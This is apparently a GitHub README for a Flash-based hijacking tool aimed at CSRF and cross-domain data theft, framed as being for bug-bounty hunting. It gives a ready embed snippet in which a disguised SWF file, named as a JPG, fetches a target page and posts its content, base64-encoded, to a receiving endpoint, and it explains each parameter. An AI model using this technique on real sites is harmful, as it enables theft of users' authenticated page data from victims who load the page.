GitHub - 7dog7/flash-hijack: Flash hijacking tool (CSRF, hijacking, redirects, swf). Open an issue if you have a request. For SRC (security response center) bug hunting.
2019-08-09 15:51:40 Author: github.com

Flash hijacking tool

Usage: HTML:

<div> <embed src="http://www.baidu.com/hijack.jpg?jpg=http://127.0.0.1/1.png&get=http://127.0.0.1/l.php&post=http://127.0.0.1/2.php" width="970" height="107" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent"></embed> </div>

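Parameters:

jpg: an image on the domain (used so that crossdomain.xml is loaded first; otherwise the hijacked endpoint loads too slowly and the hijack fails)

get: the endpoint or page to hijack

post: receives the hijacked page, which is transmitted as base64

Article: https://zhuanlan.zhihu.com/p/67484852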


Source: https://github.com/7dog7/flash-hijack